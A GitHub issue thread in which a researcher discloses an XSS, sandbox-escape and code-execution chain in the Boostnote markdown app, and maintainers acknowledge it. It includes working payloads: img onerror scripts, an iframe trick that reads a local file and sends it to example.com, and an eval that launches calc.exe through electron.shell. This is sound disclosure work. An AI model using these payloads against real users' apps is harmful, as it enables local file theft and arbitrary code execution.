### ISSUE TITLE
Vulnerabilities - XSS=>Sandbox Escape=>Code Execution

### ISSUE THREAD

**Issue by pmood** [BoostIO/Boostnote#1443]
The following issues were confirmed in v0.8.20 in Windows 10. It's likely (IMO) the same vulnerabilities will exist in other versions (don't think html works in iOS though). These vulnerabilities require a user to open a malicious markdown (.md) file in BoostNote (or paste malicious markdown in). I would rate this vulnerability an 8.6 severity (high). See: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

I hope it's okay to disclose it here. I don't think it's a major issue due to requiring a user to download and open a malicious markdown file (rather than being exploited remotely, for example).  

## 1 - XSS

These simple proof-of-concepts will produce a harmless alert box within BoostNote that says "xss".

* \<img\> - `<img src="test" onerror="alert('xss')"/>"` 
* mouseover - `<svg onmouseover="alert('xss')"/>` (can be done with any html tags)
* There are likely many more js events that can be abused to execute javascript, but the `img` tag was the most useful that I identified (no user interaction needed). 

This alone is a serious vulnerability because a malicious markdown file could be used to read local files from a user's computer, and send them to a remote server, which is definitely not something a user would expect to be possible. A proof-of-concept:

```html
<iframe id="myframe" src="file://C:\\test.txt"></iframe>
<img src="test" onerror='setTimeout(function(){var iframe=document.getElementById("myframe"); var x=iframe.contentWindow.document.body; window.location.href="https://example.com?x=" + x.innerHTML + "d";},1000); ' />
```

The above example will embed a local file (C:\test.txt) in an iframe. The `<img>` code will wait a second, read the innerHTML (file contents) from the iframe, and then send it to `http://example.com` in the `x` parameter. 

## 2 - Sandbox Escape

While the markdown previews are put in a sandboxed iframe, I believe an attacker is able to access the parent DOM since they are within the same origin (`file://`?). 

* `<img src="test" onerror="alert(document.location)"/>` produces an alert that says "about:blank" (sandboxed)
* `<img src="test" onerror="console.log(window.parent.document.location)"/>` produces an alert with something *like* this: `file:///C:/Users/me/AppData/Local/boost/app-0.8.20/resources/app/lib/main.html#/storages/<storageid>/folders/<folderid>?key=<mykey>&_k=<k-value>`

While the significance of this is not immediately apparent, an attacker with access to `window.parent` is able to access `electron` directly which provides a simple method for code execution... 

## 3 - Code Execution

Utilizing the above two vulnerabilities, an attacker could craft a payload such as this: 

* `<img src="test" onerror='window.parent.eval("electron.shell.openItem(\"calc.exe\")")'></img>`  - executes the Windows Calculator program. 

An attacker would be able to use these vulnerabilities to craft malicious markdown files that execute code immediately upon rendering in BoostNote. An attacker could use this to run malware to take over a user's computer, steal sensitive information, or delete any files the current user has access to. 

Please let me know if any additional information is needed. I really have been enjoying the program, and just kind of stumbled across the XSS issue, and decided to see what could be done with it.

**Comment by pmood** [comment]
@kazup01 Any update on this? Do you need more information? Just making sure it's been seen.

**Comment by Rokt33r** [comment]
@pmood Thanks for the reporting. It looks very critical. We will fix this soon.

**Comment by Redsandro** [comment]
Just heard about this. I think this is critical and created a rudimentary fix for the obvious cases in #1634. It'd be cool if you can figure out if there are other ways to xss afther this PR is merged.
